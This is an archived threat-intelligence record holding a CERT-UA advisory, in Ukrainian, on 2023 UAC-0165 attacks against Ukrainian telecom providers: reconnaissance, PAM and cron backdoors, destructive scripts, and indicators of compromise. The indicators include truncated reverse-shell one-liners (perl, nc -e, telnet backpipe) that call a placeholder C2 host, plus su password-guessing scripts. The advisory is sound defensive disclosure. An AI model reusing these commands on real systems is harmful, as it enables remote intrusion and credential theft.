{
	"id": "302a58ab-1ccf-4440-b54f-7e82e40f624f",
	"created_at": "2026-04-06T00:09:39.590656Z",
	"updated_at": "2026-04-10T03:24:18.256399Z",
	"deleted_at": null,
	"sha1_hash": "1fd0393ff8a786d5f2fbc8a4a51f890f6b410993",
	"title": "CERT-UA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 867178,
	"plain_text": "CERT-UA\r\nArchived: 2026-04-05 15:46:43 UTC\r\nЗагальна інформація\r\nЗа даними публічних джерел за період з 11.05.2023 по 27.09.2023 організованою групою зловмисників, що\r\nвідстежується за ідентифікатором UAC-0165, здійснено втручання в інформаційно-комунікаційні системи\r\n(ІКС) не менше ніж 11 провайдерів телекомунікацій України, що, серед іншого, призвело до перебоїв в\r\nнаданні послуг споживачам.\r\nУрядовою командою реагування на комп’ютерні надзвичайні події України CERT-UA у тісній взаємодії з\r\nфахівцями одного з провайдерів вжито заходів з дослідження інциденту, завдяки чому встановлено\r\nобставини кібератак, з'ясовано характерні тактики, техніки та процедури зловмисників, а також розкрито\r\nзловмисний задум щодо реалізації кіберзагроз на ряді аналогічних підприємств.\r\nВ умовах невпинної цифровізації значної кількості сфер сучасного життя, ураховуючи персистентну\r\nзагрозу втрати зв'язку в результаті кінетичних атак на телекомунікації та об'єкти енергозабезпечення, стале\r\nфункціонування операторів та провайдерів є суспільно важливою потребою.\r\nЗ метою відбиття агресії в кіберпросторі, закликаємо українських провайдерів переглянути власні поверхні\r\nатак, врахувати викладені технічні деталі та, у разі виявлення (ознак) інцидентів інформаційної безпеки,\r\nневідкладно звертатися до CERT-UA з метою ініціювання заходів з реагування.\r\nСлід враховувати, що інцидент, досліджений належним чином, підвищує вірогідність недопущення\r\nреалізації кіберзагроз на інших об'єктах нашої держави.\r\nЗведена (не вичерпна) інформація щодо особливостей здійснення кібератак на українських провайдерів\r\nнаведена нижче.\r\nТехнічна інформація\r\nЯк правило першим етапом кібератаки є розвідка, що починається з \"грубого\" сканування підмереж\r\n(автономної системи) провайдера за типовим набором мережевих портів із застосуванням, зокрема,\r\nmasscan. Приклад застосованого конфігураційного файлу, а також скрипта для запуску masscan наведено\r\nна рис.1-2, відповідно.\r\nhttps://cert.gov.ua/article/6123309\r\nPage 1 of 11\n\nРис.1 Приклад конфігураційного файлу masscan\r\nРис.2 Приклад скрипта для запуску masscan з переліком типових мережевих портів (conf.txt)\r\nУ випадку ідентифікації інтерфейсів управління (наприклад, SSH, RDP), за умови не обмеження доступу\r\nдо останніх, ініціюється підбір автентифікаційних даних. У разі виявлення ознак вразливостей\r\nhttps://cert.gov.ua/article/6123309\r\nPage 2 of 11\n\nздійснюється їхня експлуатація. Публічно доступні сервіси (вебдодатки), такі як білінг, особистий кабінет\r\nкористувача, хостингові сервери (та вебсайти) тощо, аналізуються за допомогою спеціалізованих програм,\r\nв тому числі: ffuf, dirbuster, gowitness, nmap тощо.\r\nЗауважимо (!), що активність по розвідці та експлуатації проводиться із заздалегідь скомпрометованих\r\nсерверів, розміщених, зокрема, в українському сегменті мережі Інтернет. Для маршрутизації трафіку через\r\nтакі вузли застосовуються проксі-сервери dante, socks5 та інші.\r\nДетальний аналіз серверів, що використовуються як плацдарм для проведення кібератак, дозволив\r\nпідтвердити факт їхньої завчасної компрометації. Крім того, встановлено додаткові ознаки такої\r\nкомпрометації.\r\n1. Зазвичай, що також справедливо і для серверів хостингу, зловмисники встановлюють шкідливий PAM-модуль (відстежується як POEMGATE), що надає можливість автентифікуватися із статично визначеним\r\nпаролем та зберігає введені під час автентифікації логіни та паролі у файл в XOR-кодованому вигляді\r\n(рис.3). Такі бекдори встановлюються заздалегідь та, з плином часу, надають змогу отримати актуальні\r\nавтентифікаційні дані адміністраторів, які, в свою чергу, доволі часто використовуються для доступу до\r\nіншого серверного та мережевого обладнання.\r\nhttps://cert.gov.ua/article/6123309\r\nPage 3 of 11\n\nhttps://cert.gov.ua/article/6123309\r\nPage 4 of 11\n\nРис.3 Приклад декомпільованого програмного коду POEMGATE\r\n2. З метою обходу налаштувань, пов'язаних з обмеженням можливості використання командної оболонки\r\n(shell), оригінальні файли \"/bin/false\", \"/bin/nologin\" замінюються на \"bash\".\r\n3. Видалення ознак несанкціонованого доступу досягається, серед іншого, запуском утиліти WHITECAT.\r\n4. Додатково на сервер може встановлюватися варіант програми POSEIDON (\"/lib/x86_64-linux-gnu/libs.so\"), функціонал якої містить повний спектр засобів віддаленого управління ЕОМ. При цьому,\r\nперсистентність POSEIDON забезпечується шляхом підміни (модифікації) легітимного бінарного файлу\r\n\"/usr/sbin/cron\", в структуру якого додається програмний код, що створює потік з аргументом (start_routine)\r\nу вигляді функції \"RunMain\", яка імпортується з \"libc.so\" (рис.4):\r\nhttps://cert.gov.ua/article/6123309\r\nPage 5 of 11\n\nРис.4 Приклад коду модифікованого cron для виклику \"RunMain\" з метою запуску POSEIDON\r\nУ випадку надання провайдером послуг хостингу, після компрометації вебсайту на вебсервер може\r\nзавантажуватися бекдор Weevely. Якщо сервер знаходиться в межах ІКС провайдера (та має \"внутрішні\"\r\nінтерфейси), він може бути використаний для розвитку атаки на інші елементи DMZ і/або локальної\r\nобчислювальної мережі.\r\nОкрім спеціалізованих програм, персистентний несанкціонований доступ до інфраструктури провайдера\r\nреалізується за допомогою штатних облікових записів VPN (зазначеному сприяє відсутність\r\nhttps://cert.gov.ua/article/6123309\r\nPage 6 of 11\n\nбагатофакторної автентифікації на основі одноразового коду з додатку). Очевидною ознакою\r\nкомпрометації VPN є підключення з IP-адрес мережі TOR та сервісів VPN, в тому числі тих, що\r\n\"класифікуються\" як українські.\r\nПісля проникнення до ІКС основні зусилля зосереджуються на ідентифікації так званих джамп-хостів та\r\nкомп'ютерів системних адміністраторів. Якщо подальше горизонтальне переміщення унеможливлене\r\nсписками контролю доступу мережевого обладнання, зловмисники можуть вносити зміни в їх\r\nналаштування.\r\nТак як з часів \"КіберБеркуту\" майже кожен злам супроводжується публікацією \"пруфів\", частина часу\r\nприсвячується ексфільтрації документів, креслень, схем, договорів. Принагідно, для підсилення \"ефекту\"\r\nта надання більшої публічності, зловмисники вдаються до викрадення паролів від офіційних облікових\r\nзаписів в Telegram, Facebook, а також токенів для розсилання SMS, тощо. Тому слід окремо звернути увагу\r\nна убезпечення таких \"медійних\" акаунтів шляхом налаштування багатофакторної автентифікації.\r\nНа заключному етапі кібератаки здійснюється виведення з ладу активного мережевого та серверного\r\nобладнання, а також систем зберігання даних. Зазначеному сприяє використання однакових паролів та не\r\nобмежений доступ до інтерфейсів управління цим обладнанням. Крім того, відсутність резервних копій\r\nактуальних конфігурацій негативно впливає на можливість оперативного відновлення працездатності.\r\nПриклад одного зі скриптів-деструкторів наведено на рис.5.\r\nРис.5 Приклад скрипта-деструктора\r\nЯк приклад, для порушення штатного режиму функціонування обладнання Mikrotik може застосовуватися\r\nвідповідний функціонал скриптів та запланованих задач. Приклад одного зі скриптів наведено на рис.6.\r\nhttps://cert.gov.ua/article/6123309\r\nPage 7 of 11\n\nРис.6 Приклад скрипта та завдання для Mikrotik\r\nНаполегливо рекомендуємо взяти до уваги інформацію, що викладена у статті \"Як бути відповідальним та\r\nвтримати кіберфронт\" (https://cert.gov.ua/article/5436463).\r\nКористуючись нагодою висловлюємо вдячність операторам і провайдерам телекомунікацій України за\r\nсприяння у боротьбі з кіберзагрозами та засвідчуємо готовність щодо залучення CERT-UA для\r\nдослідження кібератак, обміну інформацією, перевірки аномалій тощо.\r\nІндикатори кіберзагроз\r\nФайли:\r\n2b88885fb57e28497522238bd8f8befc  8ddd681dd834ab66f6a1c00ba2830717bf845de5639708eb8e8ab795ffd1df5a\r\n5d9a661f35d4e136d389bea878c4252f  eb01925836eed1dbd85a8ab9aa05c5c45dc051abaae9e67db3a53489d776b6c2\r\n20a07ba71cab0f92c566b31e96fdf0e8  9060ca8e829fc136d1ecd95a5204abb48f3ce5b7339619c5668c7e176dcbb235\r\na74dbcae530f52f62cbdcef3dc18feeee9c5dc9cec95f31cea2eb88cc26a35d29c5f89f23bff6a7cfa1250dec6d5701a\r\n45fad72d370ff88c5b349cb741cc26ce  8fb3ed6261a2358e0890bfd544e515af232f87d3aef947e09f640da7cc1b89d9\r\n59f2c3f6e4baf721c02a66179147241a  0e24a1268212a790bc3993750f194ac1e0996a6770b32b498341f06abac45d81\r\n75cde685cd3f00f354155e3c433698c7  e4cff7071e184e3f1bfedfe30afa52ddd2cac1a00983508d142e51ecebfcba14\r\n61b70767326387f141a18e2fbb250a68  b5ec1d43462a770d207eefb906516631e4d80eea55779509616b58b39a764455\r\n302f158ca6f6094e90bd43f7748dd65f  65c880f2a3833898c54d7f48ee0709a13887376b2ea5bc933b2e70f29614e728\r\nМережеві:\r\neurotelle[.]com\r\n(IP-адреси, використані для SSH/VPN доступу)\r\n103[.]251.167.20\r\n103[.]251.167.21\r\n104[.]244.72.8\r\n107[.]189.30.69\r\n139[.]99.237.205\r\n146[.]59.233.33\r\n146[.]59.35.246\r\n156[.]146.63.139\r\n158[.]118.218.193\r\nhttps://cert.gov.ua/article/6123309\r\nPage 8 of 11\n\n1\r\n62[.]247.73.192\r\n162[.]247.74.201\r\n162[.]247.74.206\r\n162[.]247.74.216\r\n162[.]247.74.27\r\n162[.]247.74.74\r\n167[.]86.94.107\r\n171[.]25.193.20\r\n171[.]25.193.235\r\n171[.]25.193.25\r\n171[.]25.193.77\r\n171[.]25.193.78\r\n179[.]43.159.195\r\n179[.]43.159.198\r\n182[.]118.218.193\r\n185[.]100.86.121\r\n185[.]100.87.41\r\n185[.]129.61.129\r\n185[.]129.61.7\r\n185[.]129.62.62\r\n185[.]130.47.58\r\n185[.]14.28.207\r\n185[.]165.169.239\r\n185[.]220.101.152\r\n185[.]220.102.240\r\n185[.]220.102.241\r\n185[.]220.102.242\r\n185[.]220.102.247\r\n185[.]220.102.251\r\n185[.]220.102.252\r\n185[.]220.102.253\r\n185[.]220.102.254\r\n185[.]220.102.8\r\n185[.]220.103.8\r\n185[.]233.100.23\r\n185[.]235.146.29\r\n185[.]241.208.206\r\n185[.]241.208.232\r\n185[.]246.188.60\r\n185[.]246.188.67\r\n185[.]246.188.74\r\n185[.]254.75.55\r\n185[.]34.33.2\r\n185[.]56.83.83\r\n185[.]67.82.114\r\n192[.]42.116.13\r\n192[.]42.116.16\r\nhttps://cert.gov.ua/article/6123309\r\nPage 9 of 11\n\n192[.]42.116.18\r\n192[.]42.116.23\r\n192[.]42.116.25\r\n193[.]218.118.158\r\n193[.]218.118.182\r\n195[.]69.202.145\r\n203[.]28.246.189\r\n204[.]28.48.77\r\n204[.]8.156.142\r\n217[.]12.208.73\r\n23[.]129.64.133\r\n2[.]56.164.52\r\n2[.]58.56.101\r\n45[.]139.122.241\r\n45[.]141.215.111\r\n45[.]154.98.225\r\n46[.]182.21.248\r\n51[.]89.153.112\r\n5[.]181.80.132\r\n5[.]252.118.19\r\n5[.]255.99.205\r\n5[.]45.73.243\r\n62[.]102.148.68\r\n62[.]182.84.146\r\n77[.]48.28.204\r\n77[.]48.28.236\r\n79[.]137.194.146\r\n80[.]67.167.81\r\n82[.]221.128.191\r\n84[.]239.46.144\r\n89[.]147.111.106\r\n89[.]248.165.181\r\n91[.]208.75.153\r\n91[.]208.75.3\r\n91[.]224.92.110\r\n94[.]102.51.15\r\n95[.]214.234.139\r\n95[.]214.55.43\r\nХостові:\r\n/lib/libc.so.7\r\n/lib/x86_64-linux-gnu/libs.so\r\n/lib/x86_64-linux-gnu/security/pam_unix.so\r\n/tmp/.1\r\n/usr/sbin/wccrt\r\nhttps://cert.gov.ua/article/6123309\r\nPage 10 of 11\n\n/usr/sbin/wcc\r\n/var/lib/vim‍/ps\r\n/var/lib/vim‍/vfth/scan.sh\r\nexpect -c 'spawn su -c \"whoami\" \"%user%\"; expect -re \"assword\"; send \"%password%\"; expect eof;' 2\u003e\u00261\r\nperl -e 'use Socket;$i=\"%C2IP%\";$p=3333;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connec\r\npython -c 'import pexpect as p,sys;c=p.spawn(\"su %user% -c whoami\");c.expect(\".*assword:\");c.sendline\r\nsleep 1; nc -e /bin/sh %C2IP% 3333 2\u003e\u00261\r\nsleep 1;rm -rf /tmp/backpipe;mknod /tmp/backpipe p;telnet %C2IP% 3333 0\u003c/tmp/backpipe | /bin/sh 1\u003e/tm\r\n/bin/false (порушення цілісності/підміна)\r\n/bin/nologin (порушення цілісності/підміна)\r\n/usr/sbin/cron (порушення цілісності/підміна)\r\nSource: https://cert.gov.ua/article/6123309\r\nhttps://cert.gov.ua/article/6123309\r\nPage 11 of 11",
	"extraction_quality": 1,
	"language": "UK",
	"sources": [
		"MITRE",
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://cert.gov.ua/article/6123309"
	],
	"report_names": [
		"6123309"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434179,
	"ts_updated_at": 1775791458,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1fd0393ff8a786d5f2fbc8a4a51f890f6b410993.pdf",
		"text": "https://archive.orkl.eu/1fd0393ff8a786d5f2fbc8a4a51f890f6b410993.txt",
		"img": "https://archive.orkl.eu/1fd0393ff8a786d5f2fbc8a4a51f890f6b410993.jpg"
	}
}